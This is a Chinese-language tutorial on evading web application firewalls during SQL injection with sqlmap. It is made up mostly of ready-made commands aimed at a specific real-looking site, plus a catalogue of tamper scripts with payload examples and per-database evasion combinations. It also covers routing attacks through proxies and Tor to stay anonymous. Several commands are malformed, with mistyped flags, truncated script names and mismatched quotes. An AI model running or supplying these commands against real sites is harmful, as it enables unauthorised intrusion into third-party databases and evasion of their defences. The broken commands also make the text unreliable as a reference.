【SQL注入/WAF】使用sqlmap 繞過防火牆進行注入測試

0x00 前言

   如今的網絡環境每每是WAF/IPS/IDS保護着Web 服務器等等，這種保護措施每每會過濾擋住咱們的SQL注入查詢連接，甚至封鎖咱們的主機IP，因此這個時候，咱們就要考慮怎樣進行繞過，達到注入的目標。由於如今WAF/IPS/IDS都把sqlmap 列入黑名單了，呵呵！可是本文基於sqlmap 進行繞過注入測試，介紹至今仍然實用有效的技巧，如下策略在特定的環境可以成功繞過，具體是否繞過，請仔細查看輸出的信息。

0x01 確認WAF

     首先咱們判斷該Web 服務器是否被WAF/IPS/IDS保護着。這點很容易實現，由於咱們在漏掃或者使用專門工具來檢測是否有WAF，這個檢測，在nmap 的NSE，或者WVS的策略或者APPSCAN的策略中都有，咱們能夠利用這些來判斷。在此咱們，也介紹使用sqlmap 進行檢測是否有WAF/IPS/IDS

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首選

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10  --check-waf#備選

0x02 使用參數進行繞過

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 #使用任意瀏覽器進行繞過，尤爲是在WAF配置不當的時候

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#使用HTTP 參數污染進行繞過，尤爲是在ASP.NET/IIS 平臺上

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 #使用長的延時來避免觸發WAF的機制，這方式比較耗時

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理進行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy#禁止使用系統的代理，直接鏈接進行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session#清空會話，重構注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex#或者使用參數 --no-cast ，進行字符碼轉換

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --mobile #對移動端的服務器進行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tor # 匿名注入

0x03 使用腳本介紹

1 使用格式：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py#腳本A，腳本B 

2 腳本總類

01 apostrophemask.py#用utf8代替引號；Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

02 equaltolike.py#MSSQL * SQLite中like 代替等號；Example:  Input: SELECT * FROM users WHERE id=1 ；Output: SELECT * FROM users WHERE id LIKE 1

03 greatest.py#MySQL中繞過過濾’>’ ,用GREATEST替換大於號；Example: ('1 AND A > B') '1 AND GREATEST(A,B+1)=A'

04 space2hash.py#空格替換爲#號 隨機字符串 以及換行符；Input: 1 AND 9227=9227；Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

05 apostrophenullencode.py#MySQL 4, 5.0 and 5.5，Oracle 10g，PostgreSQL繞過過濾雙引號，替換字符和雙引號；

06 halfversionedmorekeywords.py#當數據庫爲mysql時繞過防火牆，每一個關鍵字以前添加mysql版本評論；

07 space2morehash.py#MySQL中空格替換爲 #號 以及更多隨機字符串 換行符；

08 appendnullbyte.py#Microsoft Access在有效負荷結束位置加載零字節字符編碼；Example: ('1 AND 1=1') '1 AND 1=1%00'

09 ifnull2ifisnull.py#MySQL，SQLite (possibly)，SAP MaxDB繞過對 IFNULL 過濾。 替換相似’IFNULL(A, B)’爲’IF(ISNULL(A), B, A)’

10 space2mssqlblank.py(mssql)#mssql空格替換爲其它空符號

11base64encode.py#用base64編碼j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

12 space2mssqlhash.py#mssql查詢中替換空格

13 modsecurityversioned.py#(mysql中過濾空格，包含完整的查詢版本註釋;Example: ('1 AND 2>1--') '1 /*!30874AND 2>1*/--'

14 space2mysqlblank.py#(mysql中空格替換其它空白符號

15 between.py#MS SQL 2005，MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0中用between替換大於號（>）

16 space2mysqldash.py#MySQL，MSSQL替換空格字符（」）（’ – ‘）後跟一個破折號註釋一個新行（’ n’）

17 multiplespaces.py#圍繞SQL關鍵字添加多個空格；Example: ('1 UNION SELECT foobar') '1 UNION SELECT foobar'

18 space2plus.py#用+替換空格；Example: ('SELECT id FROM users') 'SELECT+id+FROM+users'

19 bluecoat.py#MySQL 5.1, SGOS代替空格字符後與一個有效的隨機空白字符的SQL語句。 而後替換=爲like

20 nonrecursivereplacement.py#雙重查詢語句。取代predefined SQL關鍵字with表示 suitable for替代（例如 .replace（「SELECT」、」」)） filters

21 space2randomblank.py#代替空格字符（「」）從一個隨機的空白字符可選字符的有效集

22 sp_password.py#追加sp_password’從DBMS日誌的自動模糊處理的26 有效載荷的末尾

23 chardoubleencode.py#雙url編碼(不處理以編碼的)

24 unionalltounion.py#替換UNION ALL SELECT UNION SELECT；Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

25 charencode.py#Microsoft SQL Server 2005，MySQL 4, 5.0 and 5.5，Oracle 10g，PostgreSQL 8.3, 8.4, 9.0url編碼；

26 randomcase.py#Microsoft SQL Server 2005，MySQL 4, 5.0 and 5.5，Oracle 10g，PostgreSQL 8.3, 8.4, 9.0中隨機大小寫

27 unmagicquotes.py#寬字符繞過 GPC addslashes；Example: * Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20

28 randomcomments.py#用/**/分割sql關鍵字；Example:‘INSERT’ becomes ‘IN//S//ERT’

29 charunicodeencode.py#ASP，ASP.NET中字符串 unicode 編碼；

30 securesphere.py#追加特製的字符串；Example: ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"

31 versionedmorekeywords.py#MySQL >= 5.1.13註釋繞過

32 space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’

33 halfversionedmorekeywords.py#MySQL < 5.1中關鍵字前加註釋

 

0x04腳本參數組合策略繞過

1 mysql繞過：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversioned.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent --hpp  --tamper=space2mysqldash.p,versionedmorekeywords.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  -delay=3.5  ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24」 --tamper=apostrophemask.py,equaltolike.py

備註：這些組合策略能夠根據注入的反饋信息，及時調整組合策略

2 MSSQL：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  -delay=3.5  ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24」 --tamper=randomcase.py,charencode.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --hpp --tamper=space2comment.py,randomcase.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --time-sec=120  --tamper=space2mssqlblank.py,securesphere.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --tamper=unionalltounion.py,base64encode.p

3 ms access:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --random-agent  --tamper=appendnullbyte.py,space2plus.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --random-agent --hpp  --tamper=chardoubleencode.py

4 Oracle：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=5 --random-agent--hpp --tamper=unmagicquotes.py,unionalltounion.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=5--user-agent =「Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0」 --hpp --tamper=charunicodeencode.py,chardoubleencode.py

5 建議：

      由於WAF可能採用白名單規則，因此對於選擇哪一種策略，重點是根據-v 3 提示的信息進行判斷，能夠抓取主流的瀏覽器的user-agent ,s適當的延時，加上注入字符轉換---大小寫、空格、字符串、註釋、加密等等方式

      鑑於參數和32種腳本，在咱們平時的注入，這些經過不一樣的多重組合來進行測試，這個測試或者比較耗時

 

歡迎你們分享更好的思路，熱切期待^^_^^ !!！